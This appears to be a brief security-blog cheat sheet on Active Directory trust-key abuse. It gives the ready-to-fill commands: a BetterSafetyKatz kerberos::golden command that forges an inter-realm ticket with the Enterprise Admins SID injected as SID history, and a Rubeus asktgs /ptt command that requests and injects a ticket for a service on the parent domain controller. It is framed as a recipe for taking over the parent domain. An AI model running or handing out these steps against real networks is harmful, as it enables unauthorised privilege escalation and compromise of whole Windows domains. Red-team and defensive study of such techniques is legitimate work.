Skip to main content
Dr.Dolorem security

·111 words·1 min

Trust Keys
#

Abusing trust keys allows us to gain access to the domain controller of the immediate parent domain.

Obtain the trust key

Forge the Inter-realm TGT, with History SID in ticket matching the SID of the Enterprise Admins group, granting us a TGS for a service hosted in the DC of the parent domain.

BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:<child_domain> /sid:<domain_SID> /sids:<EA_SID> /rc4:<trustkey> /service:krbtgt /target:<parent_domain> /ticket:Path\to\trust_key.kirbi" "exit"

Present the TGS to the service and inject the ticket into the current session.

{% code title=“Rubeus.exe” %}

Rubeus.exe asktgs /ticket:Path\to\trust_key.kirbi /service:<service/path> /dc:<parent_dc> /ptt

{% endcode %}

Now you can forge a TGS for any service hosted on the machine, by simply changing /service:<value>